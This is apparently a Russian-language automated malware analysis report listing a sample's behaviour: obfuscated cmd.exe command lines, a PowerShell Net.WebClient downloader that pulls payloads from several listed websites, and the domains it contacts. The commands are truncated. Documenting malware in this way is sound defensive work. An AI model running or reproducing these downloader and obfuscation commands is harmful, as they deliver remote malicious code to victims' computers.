Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set fV=CPuabmTNtdzqpvIfHWrWUpdBpBkLanpZjWtroi7ResgFh:w4yX(0@J)$};,\cO=lD6S8.A-G Qx{\+'M&&for %V in (55;39;34;26;62;78;14;15;73;78;57;55;43;37;25;62...
Сетевая активность
Подключается к
- 'sh####exclusive.com':80
- 'co####ningbtc.com':80
UDP
- DNS ASK zo######ildingandsupply.com
- DNS ASK ju#####mewordpress.com
- DNS ASK sh####exclusive.com
- DNS ASK an###lovers.us
- DNS ASK co####ningbtc.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set fV=CPuabmTNtdzqpvIfHWrWUpdBpBkLanpZjWtroi7ResgFh:w4yX(0@J)$};,\cO=lD6S8.A-G Qx{\+'M&&for %V in (55;39;34;26;62;78;14;15;73;78;57;55;43;37;25;62...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set fV=CPuabmTNtdzqpvIfHWrWUpdBpBkLanpZjWtroi7ResgFh:w4yX(0@J)$};,\cO=lD6S8.A-G Qx{/+'M&&for %V in (55;39;34;26;62;78;14;15;73;78;57;55;43;37;25;62;29;40;46;70;36;4;32;40;60;34;72;7;40;34...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $Rtk='IfQ';$FiB=new-object Net.WebClient;$WFh='http://zo######ildingandsupply.com/Z@http://jualthemewordpress.com/W4XzMg@http://shariaexclusive.com/Qod6x@http://animalovers.us/cR...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "delims=.TUcMn tokens=4" %t IN ('assoc.psm1') DO %t -"
- '<SYSTEM32>\cmd.exe' /c assoc.psm1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
